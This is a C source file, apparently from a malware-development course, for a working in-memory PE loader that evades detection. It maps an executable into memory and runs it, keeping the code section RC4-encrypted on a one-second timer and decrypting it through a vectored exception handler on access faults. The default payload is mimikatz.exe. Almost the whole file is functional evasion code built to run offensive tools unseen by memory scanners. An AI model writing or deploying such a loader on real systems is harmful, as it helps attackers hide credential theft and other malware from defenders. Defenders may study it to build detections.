// @NUL0x4C | @mrd0x : MalDevAcademy

#include <Windows.h>
#include <winternl.h>
#include <stdio.h>


#define		RC4_KEY_SIZE				0x10	// 16 bytes
#define		EXEC_WAIT					1		// 1 Second - This constant is used as the time before encrypting the PE file. In other words, the PE will be exposed (to run) in memory for EXEC_WAIT seconds.


#define PRINT_WINAPI_ERR(cApiName) printf("[!] %s Failed With Error: %d\n", cApiName, GetLastError())

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ULONG_PTR		g_uPeRXAddress = NULL;
SIZE_T			g_sPeRXSize = NULL;
HANDLE			g_hTimer = NULL;
HANDLE			g_hTimerQueue = NULL;

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

typedef struct _PE_HDRS
{
	PBYTE					pFileBuffer;
	DWORD					dwFileSize;

	PIMAGE_NT_HEADERS		pImgNtHdrs;
	PIMAGE_SECTION_HEADER	pImgSecHdr;

	PIMAGE_DATA_DIRECTORY	pEntryImportDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryBaseRelocDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryTLSDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryExceptionDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryExportDataDir;

}PE_HDRS, * PPE_HDRS;

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL ReadFileFromDisk(IN LPCSTR cFileName, OUT PBYTE* ppBuffer, OUT PDWORD pdwFileSize) {

	HANDLE		hFile = INVALID_HANDLE_VALUE;
	PBYTE		pBufer = NULL;
	DWORD		dwFileSize = 0x00,
		dwNumberOfBytesRead = 0x00;

	if ((hFile = CreateFileA(cFileName, GENERIC_READ, 0x00, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE) {
		PRINT_WINAPI_ERR("CreateFileA");
		goto _FUNC_CLEANUP;
	}

	if ((dwFileSize = GetFileSize(hFile, NULL)) == INVALID_FILE_SIZE) {
		PRINT_WINAPI_ERR("GetFileSize");
		goto _FUNC_CLEANUP;
	}

	if ((pBufer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize)) == NULL) {
		PRINT_WINAPI_ERR("HeapAlloc");
		goto _FUNC_CLEANUP;
	}

	if (!ReadFile(hFile, pBufer, dwFileSize, &dwNumberOfBytesRead, NULL) || dwFileSize != dwNumberOfBytesRead) {
		PRINT_WINAPI_ERR("ReadFile");
		goto _FUNC_CLEANUP;
	}

	*ppBuffer = pBufer;
	*pdwFileSize = dwFileSize;

_FUNC_CLEANUP:
	if (hFile != INVALID_HANDLE_VALUE)
		CloseHandle(hFile);
	if (!*ppBuffer && pBufer)
		HeapFree(GetProcessHeap(), 0x00, pBufer);
	return ((*ppBuffer != NULL) && (*pdwFileSize != 0x00)) ? TRUE : FALSE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL InitializePeStruct(OUT PPE_HDRS pPeHdrs, IN PBYTE pFileBuffer, IN DWORD dwFileSize) {

	if (!pPeHdrs || !pFileBuffer || !dwFileSize)
		return FALSE;

	pPeHdrs->pFileBuffer = pFileBuffer;
	pPeHdrs->dwFileSize = dwFileSize;
	pPeHdrs->pImgNtHdrs = (PIMAGE_NT_HEADERS)(pFileBuffer + ((PIMAGE_DOS_HEADER)pFileBuffer)->e_lfanew);

	if (pPeHdrs->pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE)
		return FALSE;

	pPeHdrs->pImgSecHdr = IMAGE_FIRST_SECTION(pPeHdrs->pImgNtHdrs);
	pPeHdrs->pEntryImportDataDir = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
	pPeHdrs->pEntryBaseRelocDataDir = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
	pPeHdrs->pEntryTLSDataDir = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS];
	pPeHdrs->pEntryExceptionDataDir = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
	pPeHdrs->pEntryExportDataDir = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


BOOL FixImportAddressTable(IN PIMAGE_DATA_DIRECTORY pEntryImportDataDir, IN PBYTE pPeBaseAddress) {

	// Pointer to an import descriptor for a DLL
	PIMAGE_IMPORT_DESCRIPTOR	pImgDescriptor = NULL;
	// Iterate over the import descriptors
	for (SIZE_T i = 0; i < pEntryImportDataDir->Size; i += sizeof(IMAGE_IMPORT_DESCRIPTOR)) {
		// Get the current import descriptor
		pImgDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(pPeBaseAddress + pEntryImportDataDir->VirtualAddress + i);
		// If both thunks are NULL, we've reached the end of the import descriptors list
		if (pImgDescriptor->OriginalFirstThunk == NULL && pImgDescriptor->FirstThunk == NULL)
			break;

		// Retrieve information from the current import descriptor
		LPSTR		cDllName = (LPSTR)(pPeBaseAddress + pImgDescriptor->Name);
		ULONG_PTR	uOriginalFirstThunkRVA = pImgDescriptor->OriginalFirstThunk;
		ULONG_PTR	uFirstThunkRVA = pImgDescriptor->FirstThunk;
		SIZE_T		ImgThunkSize = 0x00;	// Used to move to the next function (iterating through the IAT and INT)
		HMODULE		hModule = NULL;

		// If OriginalFirstThunk is NULL, fallback to FirstThunk
//		if (uOriginalFirstThunkRVA == NULL)
//			uOriginalFirstThunkRVA = uFirstThunkRVA;

		// Try to load the DLL referenced by the current import descriptor
		if (!(hModule = LoadLibraryA(cDllName))) {
			PRINT_WINAPI_ERR("LoadLibraryA");
			return FALSE;
		}

		// Iterate over the imported functions for the current DLL
		while (TRUE) {

			// Get pointers to the first thunk and original first thunk data
			PIMAGE_THUNK_DATA			pOriginalFirstThunk = (PIMAGE_THUNK_DATA)(pPeBaseAddress + uOriginalFirstThunkRVA + ImgThunkSize);
			PIMAGE_THUNK_DATA			pFirstThunk = (PIMAGE_THUNK_DATA)(pPeBaseAddress + uFirstThunkRVA + ImgThunkSize);
			PIMAGE_IMPORT_BY_NAME		pImgImportByName = NULL;
			ULONG_PTR					pFuncAddress = NULL;

			// At this point both 'pOriginalFirstThunk' & 'pFirstThunk' will have the same values
			// However, to populate the IAT (pFirstThunk), one should use the INT (pOriginalFirstThunk) to retrieve the 
			// functions addresses and patch the IAT (pFirstThunk->u1.Function) with the calculated address.
			if (pOriginalFirstThunk->u1.Function == NULL && pFirstThunk->u1.Function == NULL) {
				break;
			}

			// If the ordinal flag is set, import the function by its ordinal number
			if (IMAGE_SNAP_BY_ORDINAL(pOriginalFirstThunk->u1.Ordinal)) {
				if (!(pFuncAddress = (ULONG_PTR)GetProcAddress(hModule, IMAGE_ORDINAL(pOriginalFirstThunk->u1.Ordinal)))) {
					printf("[!] Could Not Import !%s#%d \n", cDllName, (int)pOriginalFirstThunk->u1.Ordinal);
					return FALSE;
				}
			}
			// Import function by name
			else {
				pImgImportByName = (PIMAGE_IMPORT_BY_NAME)(pPeBaseAddress + pOriginalFirstThunk->u1.AddressOfData);
				if (!(pFuncAddress = (ULONG_PTR)GetProcAddress(hModule, pImgImportByName->Name))) {
					printf("[!] Could Not Import !%s.%s \n", cDllName, pImgImportByName->Name);
					return FALSE;
				}
			}

			// Install the function address in the IAT
			pFirstThunk->u1.Function = (ULONGLONG)pFuncAddress;

			// Move to the next function in the IAT/INT array
			ImgThunkSize += sizeof(IMAGE_THUNK_DATA);
		}
	}

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

typedef struct _BASE_RELOCATION_ENTRY {
	WORD	Offset : 12;
	WORD	Type : 4;
} BASE_RELOCATION_ENTRY, * PBASE_RELOCATION_ENTRY;


BOOL FixReloc(IN PIMAGE_DATA_DIRECTORY pEntryBaseRelocDataDir, IN ULONG_PTR pPeBaseAddress, IN ULONG_PTR pPreferableAddress) {

	// Pointer to the beginning of the base relocation block.
	PIMAGE_BASE_RELOCATION pImgBaseRelocation = (pPeBaseAddress + pEntryBaseRelocDataDir->VirtualAddress);

	// The difference between the current PE image base address and its preferable base address.
	ULONG_PTR uDeltaOffset = pPeBaseAddress - pPreferableAddress;

	// Pointer to individual base relocation entries.
	PBASE_RELOCATION_ENTRY pBaseRelocEntry = NULL;

	// Iterate through all the base relocation blocks.
	while (pImgBaseRelocation->VirtualAddress) {

		// Pointer to the first relocation entry in the current block.
		pBaseRelocEntry = (PBASE_RELOCATION_ENTRY)(pImgBaseRelocation + 1);

		// Iterate through all the relocation entries in the current block.
		while ((PBYTE)pBaseRelocEntry != (PBYTE)pImgBaseRelocation + pImgBaseRelocation->SizeOfBlock) {
			// Process the relocation entry based on its type.
			switch (pBaseRelocEntry->Type) {
			case IMAGE_REL_BASED_DIR64:
				// Adjust a 64-bit field by the delta offset.
				*((ULONG_PTR*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += uDeltaOffset;
				break;
			case IMAGE_REL_BASED_HIGHLOW:
				// Adjust a 32-bit field by the delta offset.
				*((DWORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += (DWORD)uDeltaOffset;
				break;
			case IMAGE_REL_BASED_HIGH:
				// Adjust the high 16 bits of a 32-bit field.
				*((WORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += HIWORD(uDeltaOffset);
				break;
			case IMAGE_REL_BASED_LOW:
				// Adjust the low 16 bits of a 32-bit field.
				*((WORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += LOWORD(uDeltaOffset);
				break;
			case IMAGE_REL_BASED_ABSOLUTE:
				// No relocation is required.
				break;
			default:
				// Handle unknown relocation types.
				printf("[!] Unknown relocation type: %d | Offset: 0x%08X \n", pBaseRelocEntry->Type, pBaseRelocEntry->Offset);
				return FALSE;
			}
			// Move to the next relocation entry.
			pBaseRelocEntry++;
		}

		// Move to the next relocation block.
		pImgBaseRelocation = (PIMAGE_BASE_RELOCATION)pBaseRelocEntry;
	}

	return TRUE;
}
//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


BOOL FixMemPermissions(IN ULONG_PTR pPeBaseAddress, IN PIMAGE_NT_HEADERS pImgNtHdrs, IN PIMAGE_SECTION_HEADER pImgSecHdr) {

	// Loop through each section of the PE image.
	for (DWORD i = 0; i < pImgNtHdrs->FileHeader.NumberOfSections; i++) {

		// Variables to store the new and old memory protections.
		DWORD	dwProtection = 0x00,
			dwOldProtection = 0x00;

		// Skip the section if it has no data or no associated virtual address.
		if (!pImgSecHdr[i].SizeOfRawData || !pImgSecHdr[i].VirtualAddress)
			continue;

		// Determine memory protection based on section characteristics.
		// These characteristics dictate whether the section is readable, writable, executable, etc.
		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE)
			dwProtection = PAGE_WRITECOPY;

		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ)
			dwProtection = PAGE_READONLY;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ))
			dwProtection = PAGE_READWRITE;

		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE)
			dwProtection = PAGE_EXECUTE;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE))
			dwProtection = PAGE_EXECUTE_WRITECOPY;

		// If memory should be RX, we save its base address and size
		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ)) {

			dwProtection = PAGE_EXECUTE_READ;

			// Save RX base address
			if (!g_uPeRXAddress)
				g_uPeRXAddress = pPeBaseAddress + pImgSecHdr[i].VirtualAddress;
			// Save the RX memory size
			if (!g_sPeRXSize)
				g_sPeRXSize = pImgSecHdr[i].SizeOfRawData;
		}

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ))
			dwProtection = PAGE_EXECUTE_READWRITE;

		// Apply the determined memory protection to the section.
		if (!VirtualProtect((PVOID)(pPeBaseAddress + pImgSecHdr[i].VirtualAddress), pImgSecHdr[i].SizeOfRawData, dwProtection, &dwOldProtection)) {
			PRINT_WINAPI_ERR("VirtualProtect");
			return FALSE;
		}
	}

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

typedef struct _USTRING {

	DWORD	Length;
	DWORD	MaximumLength;
	PVOID	Buffer;

} USTRING, * PUSTRING;

typedef NTSTATUS(NTAPI* fnSystemFunction032)(PUSTRING Data, PUSTRING Key);

BOOL Rc4EncryptDecrypt(IN PBYTE pBuffer, IN DWORD dwBufferLen, IN BOOL bDecrypt) {

	NTSTATUS				STATUS = NULL;
	BYTE					Rc4Key[RC4_KEY_SIZE] = { 0xFF, 0xDD, 0x79, 0x7F, 0x03, 0xA5, 0x87, 0xEF, 0x71, 0x4D, 0xDB, 0x7D, 0xF4, 0x47, 0x77, 0x01 };
	USTRING					uStrBuffer = { .Buffer = pBuffer,  .Length = dwBufferLen,  .MaximumLength = dwBufferLen };
	USTRING					uStrKey = { .Buffer = Rc4Key,   .Length = RC4_KEY_SIZE, .MaximumLength = RC4_KEY_SIZE };
	fnSystemFunction032		SystemFunction032 = (fnSystemFunction032)GetProcAddress(LoadLibrary(TEXT("Advapi32")), "SystemFunction032");
	DWORD					dwOldProtection = 0x00;

	if (!pBuffer || !dwBufferLen)
		return FALSE;

	// Change memory permissions to RW to be able to encrypt/decrypt
	if (!VirtualProtect(pBuffer, dwBufferLen, PAGE_READWRITE, &dwOldProtection)) {
		PRINT_WINAPI_ERR("VirtualProtect [1]");
		return FALSE;
	}

	// Encrypt/Decrypt
	if ((STATUS = SystemFunction032(&uStrBuffer, &uStrKey)) != 0x0) {
		printf("[!] SystemFunction032 FAILED With Error: 0x%0.8X \n", STATUS);
		return FALSE;
	}

	// Set memory permissions to RO/RX
	if (!VirtualProtect(pBuffer, dwBufferLen, (bDecrypt == TRUE ? PAGE_EXECUTE_READ : PAGE_READONLY), &dwOldProtection)) {
		PRINT_WINAPI_ERR("VirtualProtect [2]");
		return FALSE;
	}


	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

/*
	- https://learn.microsoft.com/en-us/windows/win32/api/threadpoollegacyapiset/nf-threadpoollegacyapiset-createtimerqueuetimer
	- https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms687066(v=vs.85)
	- https://learn.microsoft.com/en-us/windows/win32/sync/using-timer-queues
*/

// This timed callback function is executed by "CreateTimerQueueTimer" to encrypt data at "g_uPeRXAddress"
VOID CALLBACK ObfuscationTimerCallback(IN PVOID lpParameter, IN BOOLEAN TimerOrWaitFired) {

	Rc4EncryptDecrypt(g_uPeRXAddress, g_sPeRXSize, FALSE);
}


//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

LONG WINAPI VectoredExceptionHandler(PEXCEPTION_POINTERS pExceptionInfo);

BOOL InjectLocalPE(IN PPE_HDRS pPeHdrs) {

	PBYTE			pPeBaseAddress = NULL;
	PVOID			pEntryPoint = NULL;
	PVOID			pVeHandler = NULL;

	// Allocating memory for the PE
	if ((pPeBaseAddress = VirtualAlloc(NULL, pPeHdrs->pImgNtHdrs->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) == NULL) {
		PRINT_WINAPI_ERR("VirtualAlloc");
		return FALSE;
	}

	printf("[i] Base Address: 0x%p \n", pPeBaseAddress);
	printf("[i] Image Size: %d \n", pPeHdrs->pImgNtHdrs->OptionalHeader.SizeOfImage);

	// Copying the PE's section 
	for (int i = 0; i < pPeHdrs->pImgNtHdrs->FileHeader.NumberOfSections; i++) {
		memcpy(
			(PVOID)(pPeBaseAddress + pPeHdrs->pImgSecHdr[i].VirtualAddress),
			(PVOID)(pPeHdrs->pFileBuffer + pPeHdrs->pImgSecHdr[i].PointerToRawData),
			pPeHdrs->pImgSecHdr[i].SizeOfRawData
		);
	}

	// Fixing the IAT 
	printf("[i] Resolving Imports ...");
	if (!FixImportAddressTable(pPeHdrs->pEntryImportDataDir, pPeBaseAddress))
		return FALSE;
	printf("[+] DONE \n");

	// Applying relocations
	printf("[i] Resolving Relocations ...");
	if (!FixReloc(pPeHdrs->pEntryBaseRelocDataDir, pPeBaseAddress, pPeHdrs->pImgNtHdrs->OptionalHeader.ImageBase))
		return FALSE;
	printf("[+] DONE \n");

	// Setting up suitable memory permissions
	printf("[i] Setting Memory Permissions ...");
	if (!FixMemPermissions(pPeBaseAddress, pPeHdrs->pImgNtHdrs, pPeHdrs->pImgSecHdr))
		return FALSE;
	printf("[+] DONE \n");

	printf("[i] Performing PE Fluctuation on: 0x%p [ %ld ]\n", g_uPeRXAddress, g_sPeRXSize);

	if (!g_uPeRXAddress || !g_sPeRXSize)
		return FALSE;

	// Set exception handlers of the injected PE (if exists)
	if (pPeHdrs->pEntryExceptionDataDir->Size) {
		printf("[i] Registering PE's Exception Handlers ... ");
		// Retrieve the function table entry
		PIMAGE_RUNTIME_FUNCTION_ENTRY pImgRuntimeFuncEntry = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(pPeBaseAddress + pPeHdrs->pEntryExceptionDataDir->VirtualAddress);
		// Register the function table
		if (!RtlAddFunctionTable(pImgRuntimeFuncEntry, (pPeHdrs->pEntryExceptionDataDir->Size / sizeof(IMAGE_RUNTIME_FUNCTION_ENTRY)), pPeBaseAddress)) {
			PRINT_WINAPI_ERR("RtlAddFunctionTable");
		}
		printf("[+] DONE \n");
	}

	// Register a VEH before executing anything
	if (!(pVeHandler = AddVectoredExceptionHandler(0x01, VectoredExceptionHandler))) {
		PRINT_WINAPI_ERR("AddVectoredExceptionHandler");
		return FALSE;
	}

	// Execute TLS callbacks (if exists)
	if (pPeHdrs->pEntryTLSDataDir->Size) {
		printf("[i] Executing TLS Callbacks ... ");
		// Retrieve the address of the TLS Directory.
		PIMAGE_TLS_DIRECTORY	pImgTlsDirectory = (PIMAGE_TLS_DIRECTORY)(pPeBaseAddress + pPeHdrs->pEntryTLSDataDir->VirtualAddress);
		// Get the address of the TLS Callbacks from the TLS Directory.
		PIMAGE_TLS_CALLBACK* pImgTlsCallback = (PIMAGE_TLS_CALLBACK*)(pImgTlsDirectory->AddressOfCallBacks);
		CONTEXT					pCtx = { 0x00 };

		/*
		if (!GetThreadContext((HANDLE)-2, &pCtx)) {
			PRINT_WINAPI_ERR("GetThreadContext");
		}
		*/

		// Iterate through and invoke each TLS Callback until a NULL callback is encountered.
		for (int i = 0; pImgTlsCallback[i] != NULL; i++) {
			pImgTlsCallback[i]((LPVOID)pPeBaseAddress, DLL_PROCESS_ATTACH, &pCtx);
		}
		printf("[+] DONE \n");
	}

	// Calculate PE
	pEntryPoint = (PVOID)(pPeBaseAddress + pPeHdrs->pImgNtHdrs->OptionalHeader.AddressOfEntryPoint);

	// Creates a queue for timers
	if (!(g_hTimerQueue = CreateTimerQueue())) {
		PRINT_WINAPI_ERR("CreateTimerQueue");
		return FALSE;
	}

	// Execute the "ObfuscationTimerCallback" function after "EXEC_WAIT" seconds.
	// "ObfuscationTimerCallback" will call "Rc4EncryptDecrypt" which will encrypt the RX memory of the PE and set it to RO
	if (!CreateTimerQueueTimer(&g_hTimer, g_hTimerQueue, (WAITORTIMERCALLBACK)ObfuscationTimerCallback, NULL, EXEC_WAIT * 1000, 0x00, 0x00)) {
		PRINT_WINAPI_ERR("CreateTimerQueueTimer");
		return FALSE;
	}

	printf("[*] Executing Entry Point [ 0x%p ]:\n\n", pEntryPoint);

	// Will not execute DLL files
	if (pPeHdrs->pImgNtHdrs->FileHeader.Characteristics & IMAGE_FILE_DLL)
		return FALSE;
	else
		(*(VOID(*)()) pEntryPoint)();


	return TRUE;
}



//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

LONG WINAPI VectoredExceptionHandler(PEXCEPTION_POINTERS pExceptionInfo) {

	printf("[!] Exception Raised [!]: \n");
	printf("\t> Code: 0x%0.8X \n", pExceptionInfo->ExceptionRecord->ExceptionCode);
	printf("\t> Address: 0x%p \n", pExceptionInfo->ExceptionRecord->ExceptionAddress);
	printf("\t> State: ");

	// Check the exception code
	if (pExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {

		// Check the exception address. If the exception address is coming from inside of the RX (.text) memory, it's handled
		if (pExceptionInfo->ExceptionRecord->ExceptionAddress >= g_uPeRXAddress && pExceptionInfo->ExceptionRecord->ExceptionAddress <= (g_uPeRXAddress + g_sPeRXSize)) {

			DWORD	dwOldProtection = 0x00;

			printf("[*] HANDLED [*] \n");

			if (!g_hTimerQueue || !g_hTimer)
				goto _FAILURE;

			// Decrypt the data at g_uPeRXAddress		
			if (!Rc4EncryptDecrypt(g_uPeRXAddress, g_sPeRXSize, TRUE))
				goto _FAILURE;

			// Execute the "ObfuscationTimerCallback" function after "EXEC_WAIT" seconds.
			// "ObfuscationTimerCallback" will call "Rc4EncryptDecrypt" which will encrypt the RX memory of the PE and set it to RO
			if (!CreateTimerQueueTimer(&g_hTimer, g_hTimerQueue, (WAITORTIMERCALLBACK)ObfuscationTimerCallback, NULL, EXEC_WAIT * 1000, 0x00, 0x00)) {
				PRINT_WINAPI_ERR("CreateTimerQueueTimer");
				goto _FAILURE;
			}

			// Continue execution
			return EXCEPTION_CONTINUE_EXECUTION;
		}
	}

	printf("[-] UNHANDLED [-] \n");

_FAILURE:
	return EXCEPTION_CONTINUE_SEARCH;
}


//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//
#define		PE_FILE_TO_RUN				"mimikatz.exe"		// Change to your exe's path

#define		GET_FILENAME(path) (strrchr(path, '\\') ? strrchr(path, '\\') + 1 : path)



int main() {

	PBYTE		pFileBuffer = NULL;
	DWORD		dwFileSize = 0x00;
	PE_HDRS		PeHdrStruct = { 0 };

	printf("[i] Reading %s from disk ... ", GET_FILENAME(PE_FILE_TO_RUN));
	if (!ReadFileFromDisk(PE_FILE_TO_RUN, &pFileBuffer, &dwFileSize))
		return -1;
	printf("[+] Done \n");

	if (!InitializePeStruct(&PeHdrStruct, pFileBuffer, dwFileSize))
		return -1;

	if (!InjectLocalPE(&PeHdrStruct))
		return -1;

	WaitForSingleObject((HANDLE)-1, INFINITE);

	return 0;
}




/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
